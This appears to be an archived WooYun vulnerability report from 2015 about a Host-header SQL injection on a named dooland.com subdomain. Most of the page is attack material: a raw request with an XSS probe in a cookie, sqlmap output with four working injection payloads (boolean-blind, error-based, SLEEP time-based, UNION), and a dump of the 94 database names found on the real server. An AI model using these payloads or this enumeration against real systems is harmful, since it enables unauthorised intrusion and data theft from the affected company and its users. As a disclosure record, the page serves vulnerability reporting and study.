乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-25: 细节已通知厂商并且等待厂商处理中 2015-10-09: 厂商已经主动忽略漏洞,细节向公众公开
GET /enter/ HTTP/1.1Host: baison.dooland.com*Cookie: PHPSESSID=pdq7msm1a9aa9adcgdb128cn75; view_magid_all=%2C90254%2C90630%2C90660%2C90137%2C46199%2C; __utmt=1; __utma=206793600.1838345804.1443111007.1443111007.1443111007.1; __utmb=206793600.1.10.1443111007; __utmc=206793600; __utmz=206793600.1443111007.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
Host存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: Host #1* ((custom) HEADER) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: baison.dooland.com' AND 8597=8597 AND 'fzPY'='fzPY Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: baison.dooland.com' AND (SELECT 9881 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(9881=9881,1))),0x716b6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lSOY'='lSOY Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: baison.dooland.com' OR SLEEP(5) AND 'GgYw'='GgYw Type: UNION query Title: MySQL UNION query (NULL) - 16 columns Payload: -3343' UNION ALL SELECT CONCAT(0x717a716271,0x7175554a47426c446a53,0x716b6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---web application technology: PHP 5.4.33back-end DBMS: MySQL 5.0available databases [94]:[*] A_Bank[*] ads[*] adstat[*] adsystem[*] ahvnet[*] api_site_chinagames[*] api_site_tttz[*] asus[*] bbappnet[*] billwang[*] business[*] client[*] collector[*] common[*] cover[*] dayoo[*] dongyou[*] DoolandERP[*] doolandmanager[*] DownLoadInfoDB[*] dudubao[*] dudubao_bak[*] dudubao_book[*] dudubao_gztv[*] dudubao_hd[*] dudubao_test[*] eben[*] expand[*] fhxxw[*] gdvnet[*] gdvnet2[*] gdwap[*] gxvnet[*] gzvnet[*] hzkzy[*] ifeng[*] information_schema[*] ipad_adsys[*] JIANBAO[*] jigou[*] jsvnet[*] jxvnet[*] kindle_caixin[*] kuanzon[*] lcbook[*] lephone[*] lib[*] mag_pub[*] magazine_upload[*] mysql[*] newlib[*] news[*] newspaper[*] OEM[*] opds_aldiko[*] paycenter[*] qinghua[*] qqcaibei[*] readstat[*] ReadStat[*] sctfds[*] scvnet[*] seo[*] shop_car[*] shoutu[*] sina_book[*] sina_mag_cooperation[*] stat_dudubao[*] stat_gxvnet[*] stat_jxvnet[*] stat_paihang[*] suzhmobile[*] system_check[*] test[*] test2[*] tob_client[*] ty189[*] ty189_mail[*] ty189_mail_hd[*] ty189_mail_new[*] ty189_mail_test[*] ucenter[*] unicom[*] union[*] vip_statistics[*] vnet139[*] wangyi163[*] wap[*] xjvnet[*] ynvnet[*] zazhishe[*] zhongshan[*] zhuanti[*] zjvnet
危害等级:无影响厂商忽略
忽略时间:2015-10-09 04:02
漏洞Rank:4 (WooYun评价)
暂无